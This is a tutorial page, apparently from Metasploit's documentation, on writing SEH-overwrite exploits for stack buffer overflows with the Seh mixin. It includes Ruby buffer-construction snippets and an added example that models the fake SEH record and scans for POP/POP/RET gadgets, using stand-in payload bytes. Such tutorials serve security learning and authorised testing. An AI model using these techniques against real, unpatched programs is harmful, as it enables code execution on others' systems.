How to use the Seh mixin to exploit an exception handler
Exception handler overwriting was once a very popular technique for exploiting stack buffer overflows, but it isn't so common anymore in newer programs because they are most likely compiled with SafeSEH. For a while, even with SafeSEH enabled, it was still possible to abuse an exception handler by heap spraying, but of course memory protections didn't stop there. DEP and ASLR eventually came to the rescue, and that pretty much ended the glory days of SEH exploits. You can probably still find vulnerable applications that aren't compiled with SafeSEH, but chances are the app is outdated, no longer maintained, or more of a learning experiment for the developer. Nonetheless, exploiting a stack buffer overflow through exception handling is still fun, so if you do come across one, here's how it's supposed to be written with Metasploit's Seh mixin.
To be able to use the SEH mixin, the following requirements must be met:
- The vulnerable program does not have SafeSEH in place.
- No DEP (Data Execution Prevention). The fake SEH record the mixin builds starts with a short jump that lands in the payload following it on the stack, so that memory must be executable; DEP, as the name implies, prevents exactly that.
There are two methods provided by the Seh mixin:
- generate_seh_payload - Generates a fake SEH record with the payload attached right after it. You have to provide the pointer (address) for the SE handler, usually a POP/POP/RET. Code example:
```ruby
buffer = ''
buffer << "A" * 1024 # 1024 bytes of padding
buffer << generate_seh_payload(target.ret) # SE record overwritten after 1024 bytes
```
The actual layout of buffer should look like this in memory:
[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Payload ]
Note: You can use Metasploit's msfbinscan utility (found in the tools directory) to find all the POP/POP/RET addresses, or other variants that can be used for the same purpose.
- generate_seh_record - Generates a fake SEH record without the payload, in case you prefer to place the payload somewhere else. Code example:
```ruby
buffer = ''
buffer << "A" * 1024 # 1024 bytes of padding
buffer << generate_seh_record(target.ret) # SE record only, no payload attached
buffer << "B" * 1024 # More padding; the payload can live elsewhere
```
The memory layout should look like this:
[ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Padding ]
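To make the two layouts above concrete, here is an added, stand-alone Ruby example that is not part of the Metasploit code base: it models the bytes the generate_seh_record and generate_seh_payload helpers produce (short jump, two pad bytes, handler address, optional payload), scans a constructed byte blob for POP/POP/RET gadgets in the spirit of msfbinscan, and then checks from the assembled buffer that the nSEH jump really lands on the first payload byte. The helper names, the sample image, its base address and the NOP pad bytes are all assumptions made for illustration; the real mixin picks its own filler bytes, and target.ret comes from your target definition, not from a scan inside the module.

```ruby
# Added example (not Metasploit's own code): a stand-alone model of the buffer
# the Seh mixin's two helpers produce, plus a small POP/POP/RET scanner in the
# spirit of msfbinscan. Names, the sample image bytes and the addresses are
# constructed for illustration only.

POP_R32 = (0x58..0x5F)   # pop eax .. pop edi
RET     = 0xC3           # ret
RETN    = 0xC2           # retn imm16

# x86 short jump: EB rel8, relative to the byte after the 2-byte instruction.
def jmp_short(rel8)
  raise ArgumentError, "rel8 out of range" unless (-128..127).cover?(rel8)
  [0xEB, rel8 & 0xFF].pack("C2")
end

# Fake SEH record, same shape as generate_seh_record(target.ret):
#   [jmp short +6][2 pad bytes][handler address, little-endian]
# +6 skips the 2 pad bytes and the 4-byte handler address, so execution
# continues at whatever directly follows the record. Pad bytes are NOPs here
# (an assumption; the mixin chooses its own filler).
def seh_record(handler_addr, pad = "\x90\x90".b)
  raise ArgumentError, "pad must be 2 bytes" unless pad.bytesize == 2
  jmp_short(6) + pad + [handler_addr].pack("V")
end

# Record with the payload right behind it, same shape as generate_seh_payload.
def seh_payload(handler_addr, payload)
  seh_record(handler_addr) + payload.b
end

# Offsets of every POP r32; POP r32; RET/RETN sequence in a byte string.
def find_pop_pop_ret(bytes)
  bytes = bytes.b
  (0...bytes.bytesize).select do |i|
    POP_R32.cover?(bytes.getbyte(i)) &&
      POP_R32.cover?(bytes.getbyte(i + 1).to_i) &&
      [RET, RETN].include?(bytes.getbyte(i + 2))
  end
end

# Constructed stand-in for a module image loaded at SAMPLE_BASE (not a real
# binary): filler with "pop ebx; pop ebp; ret" at offset 0x120 and
# "pop esi; pop edi; retn 4" at offset 0x163.
SAMPLE_BASE  = 0x10000000
SAMPLE_IMAGE = ("\xCC".b * 0x120) + "\x5B\x5D\xC3".b +
               ("\xCC".b * 0x40) + "\x5E\x5F\xC2\x04\x00".b + ("\xCC".b * 0x10)

# The buffer from the generate_seh_payload example: padding, then the record
# with the payload attached. pad_len is the offset at which the SE record is
# overwritten (1024 on this page).
def build_buffer(handler_addr, payload, pad_len = 1024)
  buf = "A".b * pad_len
  buf << seh_payload(handler_addr, payload)
  buf
end

# Where the nSEH short jump lands, computed from the bytes actually in the
# buffer. Check that this equals the payload offset before trying a target.
def jump_target_offset(buf, pad_len)
  raise "no short jump at nSEH offset #{pad_len}" unless buf.getbyte(pad_len) == 0xEB
  rel8 = [buf.getbyte(pad_len + 1)].pack("C").unpack1("c")
  pad_len + 2 + rel8
end

if __FILE__ == $0
  gadgets = find_pop_pop_ret(SAMPLE_IMAGE)
  ret     = SAMPLE_BASE + gadgets.first    # plays the role of target.ret
  payload = "\xCC".b * 32                  # stand-in for the real payload
  buf     = build_buffer(ret, payload)
  printf("POP/POP/RET at %s\n", gadgets.map { |o| "0x%08x" % (SAMPLE_BASE + o) }.join(", "))
  printf("nSEH at %d, SEH = 0x%08x, jump lands at %d, payload starts at %d\n",
         1024, buf[1028, 4].unpack1("V"), jump_target_offset(buf, 1024), 1024 + 8)
end
```

The check in jump_target_offset is the one worth keeping around: the record is 8 bytes, so a payload attached by generate_seh_payload always starts at padding length + 8, and the +6 in the short jump is what makes the landing offset and the payload offset coincide. If you use generate_seh_record and place the payload elsewhere, the short jump still only reaches the bytes immediately after the record, so those bytes must themselves carry execution onward (for example with a longer jump) rather than being inert padding.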
https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/exploitation/seh.rb
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/seh.rb